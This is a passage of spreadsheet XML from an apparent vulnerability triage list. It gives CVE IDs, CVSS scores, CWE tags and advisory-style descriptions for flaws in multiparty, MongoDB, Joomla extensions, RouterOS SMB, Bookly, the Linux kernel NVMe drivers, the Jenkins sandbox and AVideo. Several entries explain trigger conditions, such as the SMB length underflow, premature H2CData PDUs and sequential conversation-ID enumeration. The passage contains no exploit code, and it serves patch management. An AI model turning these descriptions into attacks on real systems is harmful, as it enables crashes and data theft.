          <t>multiparty is a Node.js library for parsing multipart/form-data request bodies. In versions from 2.1.0 up to but not including 4.3.1, the parser does not bound the amount of memory used while accumulating the headers of a single multipart part. An unauthenticated attacker can send a single request whose part carries a very large volume of header bytes, forcing the parser to buffer all of them and exhausting the process memory, which crashes the server. This is a denial of service with no confidentiality or integrity impact. The issue is fixed in multiparty 4.3.1, which caps the size of the accumulated part headers. Users should upgrade to multiparty 4.3.1 or later.</t>
        </is>
      </c>
      <c r="S662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87908</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88032</t>
        </is>
      </c>
      <c r="D663" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E663" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F663" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K663" s="5" t="inlineStr">
        <is>
          <t>mongodb:java_driver</t>
        </is>
      </c>
      <c r="L663" s="5" t="inlineStr"/>
      <c r="M663" s="5" t="inlineStr"/>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr"/>
      <c r="Q663" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R663" s="5" t="inlineStr">
        <is>
          <t>A use-after-free in the reactive client-side encryption component of the MongoDB Java Driver can cause native resources to be freed while an affected encrypted operation is still using them when the operation is cancelled. A party able to cause such an operation to be cancelled may cause the hosting application process to terminate. Reaching the issue requires an affected reactive encryption configuration that retrieves KMS credentials on demand.</t>
        </is>
      </c>
      <c r="S663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88032</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88852</t>
        </is>
      </c>
      <c r="D664" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E664" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F664" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr"/>
      <c r="L664" s="5" t="inlineStr"/>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr"/>
      <c r="Q664" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R664" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via url option in Snippets Free extension for Joomla &lt; 7.0.0, Snippets Pro extension for Joomla &lt; 11.0.0 - Snippets substitutes variable values supplied by an article tag into saved Snippet content. The affected versions do not consider the article author's trust level. A lower-privileged author can therefore place an unsafe value into a security-sensitive position chosen by the trusted Snippet author.</t>
        </is>
      </c>
      <c r="S664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88852</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88853</t>
        </is>
      </c>
      <c r="D665" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E665" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F665" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr"/>
      <c r="K665" s="5" t="inlineStr"/>
      <c r="L665" s="5" t="inlineStr"/>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr"/>
      <c r="Q665" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R665" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via event handler option in Modals Pro extension for Joomla &lt; 17.0.0 - Modals Pro intentionally supports JavaScript Events such as on-open and on-closed. Affected versions do not distinguish trusted extension configuration from event code supplied in ordinary article content. A lower-privileged author can therefore use a documented executable feature which should be reserved for trusted authors.</t>
        </is>
      </c>
      <c r="S665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88853</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89028</t>
        </is>
      </c>
      <c r="D666" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E666" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="inlineStr"/>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr"/>
      <c r="L666" s="5" t="inlineStr"/>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr"/>
      <c r="Q666" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="R666" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS before 7.24 contains a heap memory corruption vulnerability in the userspace SMB daemon that allows remote attackers to corrupt adjacent heap memory by supplying a crafted uniPwdLen value in the SMB1 SessionSetupAndX handler. An attacker can send a malformed SMB1 request with a uniPwdLen field that triggers an integer underflow, causing the resulting value to be used as the copy length in a memory copy operation into a smaller heap buffer, corrupting adjacent heap memory.</t>
        </is>
      </c>
      <c r="S666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89028</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89063</t>
        </is>
      </c>
      <c r="D667" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E667" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F667" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr"/>
      <c r="L667" s="5" t="inlineStr"/>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr"/>
      <c r="Q667" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R667" s="5" t="inlineStr">
        <is>
          <t>The Online Scheduling and Appointment Booking System – Bookly plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 28.1 via the 'conversation_id' parameter due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to read the full AI booking conversation transcript of any customer — leaking names, email addresses, phone numbers, and appointment details echoed by the assistant — and inject arbitrary messages into any victim conversation that are subsequently replayed to the Cloud AI worker along with the full private history. Because AI conversations are stored with no owner, user, or session identifier and conversation IDs are sequential integers, an unauthenticated attacker can enumerate all customer conversations simply by incrementing the conversation_id parameter.</t>
        </is>
      </c>
      <c r="S667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89063</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89863</t>
        </is>
      </c>
      <c r="D668" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E668" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F668" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="inlineStr"/>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr"/>
      <c r="K668" s="5" t="inlineStr"/>
      <c r="L668" s="5" t="inlineStr"/>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr"/>
      <c r="Q668" s="5" t="inlineStr"/>
      <c r="R668" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: edif: Fix NULL pointer deref in RX SA delete check
qla_chk_edif_rx_sa_delete_pending() obtains the SCSI command via
GET_CMD_SP(sp) and immediately dereferences cmd-&gt;sc_data_direction.
That command pointer can be NULL: the firmware may post a status
completion for a command that has already been returned or aborted.  The
caller qla2x00_status_entry() acknowledges this on the very same status
path, re-fetching GET_CMD_SP(sp) and bailing out with the "Command
already returned" message when it is NULL -- but that check runs only
after qla_chk_edif_rx_sa_delete_pending() has already dereferenced the
pointer, so a NULL cmd crashes the kernel in interrupt context.
Return early when cmd is NULL, before touching cmd-&gt;sc_data_direction.</t>
        </is>
      </c>
      <c r="S668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89863</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89897</t>
        </is>
      </c>
      <c r="D669" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E669" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F669" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="inlineStr"/>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr"/>
      <c r="L669" s="5" t="inlineStr"/>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr"/>
      <c r="Q669" s="5" t="inlineStr"/>
      <c r="R669" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cec: Serialize exclusive follower delivery
cec_receive_notify() reads the exclusive follower pointer without the
adapter lock. Serialize the no-follower check and message delivery
against mode changes and release.</t>
        </is>
      </c>
      <c r="S669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89897</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89968</t>
        </is>
      </c>
      <c r="D670" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E670" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F670" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="inlineStr"/>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr"/>
      <c r="L670" s="5" t="inlineStr"/>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr"/>
      <c r="Q670" s="5" t="inlineStr"/>
      <c r="R670" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet-tcp: reject unsolicited H2CData PDUs
nvmet_tcp_handle_h2c_data_pdu() accepts an H2CData PDU after only checking
that its TTAG is a valid in-range command index and that the command's
data buffers are mapped. It never checks that the target has actually
solicited that data by sending an R2T for the command.
A remote host can abuse this. It submits a write command that takes the
R2T path and, before the target transmits the R2T, sends an H2CData PDU
for that command's tag. The data completes the command early, and when
the command then fails synchronously (e.g. a length mismatch caught by
nvmet_check_transfer_len()), it is completed a second time. Each
completion calls nvmet_tcp_queue_response(), so the same command is added
to queue-&gt;resp_list twice while it is still linked; the second llist_add()
makes the node point to itself (lentry-&gt;next == lentry).
nvmet_tcp_process_resp_list() then walks that self-referential node and
adds the command to resp_send_list twice. With CONFIG_DEBUG_LIST this
trips the "list_add double add" check (kernel BUG); without it the loop
never terminates and the nvmet_tcp workqueue wedges (soft-lockup). It is
remotely triggerable and needs no authentication on an allow_any_host
subsystem.
Track whether an R2T has been transmitted for a command and reject an
H2CData PDU that arrives before it. The flag is cleared on command reuse
(nvmet_tcp_get_cmd() zeroes cmd-&gt;flags) and stays set across the multiple
H2CData PDUs of a single solicited transfer.</t>
        </is>
      </c>
      <c r="S670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89968</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89971</t>
        </is>
      </c>
      <c r="D671" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E671" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F671" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="inlineStr"/>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr"/>
      <c r="K671" s="5" t="inlineStr"/>
      <c r="L671" s="5" t="inlineStr"/>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr"/>
      <c r="Q671" s="5" t="inlineStr"/>
      <c r="R671" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme: skip the zoned limits update if the zone info query failed
nvme_query_zone_info() returns either a negative errno or a positive
NVMe status code, but nvme_update_ns_info_block() only tests for the
negative case:
	ret = nvme_query_zone_info(ns, lbaf, &amp;zi);
	if (ret &lt; 0)
		goto out;
If the device fails the Identify Namespace (I/O Command Set specific)
command, or the Identify Controller command issued by
nvme_set_max_append(), the positive status falls through and setup
continues with the zero-initialized zone info.  nvme_update_zone_info()
then marks the queue zoned with chunk_sectors and ns-&gt;head-&gt;zsze set to
zero.
blk_validate_zoned_limits() does not check chunk_sectors, so the limits
commit succeeds.  blk_revalidate_disk_zones() does reject the zero zone
size, but by then the limits are live and nothing rolls them back, so
I/O keeps being submitted to a zoned queue with a zero zone size and
disk_zone_no() shifts by ilog2(0):
  nvme0n1: Invalid non power of two zone size (0)
  UBSAN: shift-out-of-bounds in include/linux/blkdev.h:747:16
  shift exponent -1 is negative
   disk_zone_no include/linux/blkdev.h:747 [inline]
   bio_straddles_zones include/linux/blkdev.h:1058 [inline]
   blk_zone_wplug_handle_write block/blk-zoned.c:1423 [inline]
   blk_zone_plug_bio.cold+0x25/0x1c8 block/blk-zoned.c:1605
   blk_mq_submit_bio+0x18fb/0x2870 block/blk-mq.c:3196
   submit_bh_wbc+0x575/0x740 fs/buffer.c:2824
   __block_write_full_folio+0x728/0xdd0 fs/buffer.c:1933
Any device, firmware or NVMe-oF target that fails this one command
reaches this.
Skip the zoned limits update in that case, and log which of the two
things happened: during a revalidation the queue keeps the zone
geometry it was last validated with, and on a first scan the namespace
is registered without zoned limits, so that it is still available as a
handle for admin commands.  Neither of the paths in
nvme_query_zone_info() that return a positive status logs anything, so
the failure would otherwise be silent.
zi.zone_size is an exact indicator: every path that returns a positive
status returns before it is assigned, and after that the only failure
left is -ENODEV, which the caller already handles.
Found by FuzzNvme.</t>
        </is>
      </c>
      <c r="S671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89971</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89974</t>
        </is>
      </c>
      <c r="D672" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E672" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F672" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="inlineStr"/>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr"/>
      <c r="K672" s="5" t="inlineStr"/>
      <c r="L672" s="5" t="inlineStr"/>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr"/>
      <c r="Q672" s="5" t="inlineStr"/>
      <c r="R672" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-fc: fix double free of fabrics options when nvme_add_ctrl() fails
nvmf_create_ctrl() owns the fabrics options and frees them whenever
-&gt;create_ctrl() returns an error, so a transport must not free them on
its own error paths.  nvme-fc tracks this by testing ctrl-&gt;ctrl.opts in
nvme_fc_ctrl_free(), which requires nvme_fc_init_ctrl() to clear that
pointer on every error exit.
The coupling is implicit, and commit 1a9e218195a5 ("nvme: split device
add from initialization") broke it by adding a second error exit.  When
nvme_add_ctrl() fails, nvme_fc_init_ctrl() jumps to out_put_ctrl:, past
the "ctrl-&gt;ctrl.opts = NULL" that only sits on the fail_ctrl: path, so
nvme_fc_ctrl_free() frees the options and nvmf_create_ctrl() frees them
a second time:
  BUG: KASAN: slab-use-after-free in nvmf_free_options+0x30/0x190
   nvmf_free_options+0x30/0x190 drivers/nvme/host/fabrics.c:1284
   nvmf_create_ctrl drivers/nvme/host/fabrics.c:1374 [inline]
  Freed by task 5534:
   nvme_fc_ctrl_free drivers/nvme/host/fc.c:2374 [inline]
   nvme_fc_init_ctrl+0xe17/0x1450 drivers/nvme/host/fc.c:3605
nvme_add_ctrl() fails when dev_set_name() cannot allocate, so this is
reachable under memory pressure or fault injection.  Without KASAN the
options are freed twice.
Rather than clear the pointer on the second exit as well, derive
ownership the way nvme-tcp, nvme-rdma and nvme-loop do, from list
membership: their free_ctrl leaves the options alone unless the
controller made it onto the transport list.
The list cannot simply be populated on the success path as it is there.
nvme-fc runs the initial connect synchronously via flush_delayed_work(),
and the controller has to be reachable on rport-&gt;ctrl_list for the whole
of it: nvme_fc_unregister_remoteport() needs to find it to signal
connectivity loss, nvme_fc_match_disconn_ls() matches an incoming
Disconnect Association LS against ctrl-&gt;association_id, which is only
assigned during that window, nvme_fc_resume_controller() needs it on
remoteport re-registration, and nvme_fc_existing_controller() uses it to
reject a duplicate connect racing the one in flight.
Keep the insertion where it is and add a fail_unlist: label, falling
into fail_ctrl:, for the error paths that run after it.  The earlier
error paths never reach the insertion and keep using fail_ctrl:
directly, so the list is only touched where the controller is actually
on it.
nvme_fc_ctrl_free() cannot use the plain "goto free_ctrl" the other
transports use, because it still has to put_device(), release the rport
reference and free the ida entry for resources taken before the
insertion.  Sample list_empty() under rport-&gt;lock instead.
ctrl-&gt;ctrl.opts also stays valid for the whole teardown now.  That is
not the bug being fixed, but it removes some fragility around the old
idiom: nvme_free_ctrl() calls nvme_auth_free() before -&gt;free_ctrl(), and
ctrl_max_dhchaps() dereferences ctrl-&gt;opts without a NULL check when
ctrl-&gt;dhchap_ctxs is set, which nvme-fc permits since NVMF_ALLOWED_OPTS
allows the dhchap options.  The nvme sysfs attributes that dereference
ctrl-&gt;opts, such as hostnqn and address, evaluate their is_visible()
test once at device_add() time and stay readable until
cdev_device_del().</t>
        </is>
      </c>
      <c r="S672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89974</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92128</t>
        </is>
      </c>
      <c r="D673" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E673" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F673" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="inlineStr"/>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K673" s="5" t="inlineStr"/>
      <c r="L673" s="5" t="inlineStr"/>
      <c r="M673" s="5" t="inlineStr"/>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P673" s="5" t="inlineStr"/>
      <c r="Q673" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R673" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier downloads a JAR file specified by URL twice, confirming the approval of the first download and loading the classpath entries from the second, allowing attackers able to define classpath entries to execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92128</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92129</t>
        </is>
      </c>
      <c r="D674" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E674" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F674" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="inlineStr"/>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K674" s="5" t="inlineStr"/>
      <c r="L674" s="5" t="inlineStr"/>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr"/>
      <c r="Q674" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R674" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not check calls from sandboxed scripts to methods added dynamically to a class at runtime, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute code outside the sandbox.</t>
        </is>
      </c>
      <c r="S674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92129</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92577</t>
        </is>
      </c>
      <c r="D675" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E675" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="inlineStr"/>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr"/>
      <c r="K675" s="5" t="inlineStr"/>
      <c r="L675" s="5" t="inlineStr"/>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr"/>
      <c r="Q675" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R675" s="5" t="inlineStr">
        <is>
          <t>In AVideo through 29.0, the API get_api_video endpoint contains a broken access control vulnerability in the clean_title branch that returns user-group-restricted videos with owner PII to anonymous callers. Attackers can query videos by their public slug to bypass group restrictions and retrieve sensitive user fields including email, phone, address, birth date, and administrator status.</t>
        </is>
      </c>
      <c r="S675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92577</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92594</t>
        </is>
      </c>
      <c r="D676" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E676" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F676" s="5" t="inlineStr">
        <is>
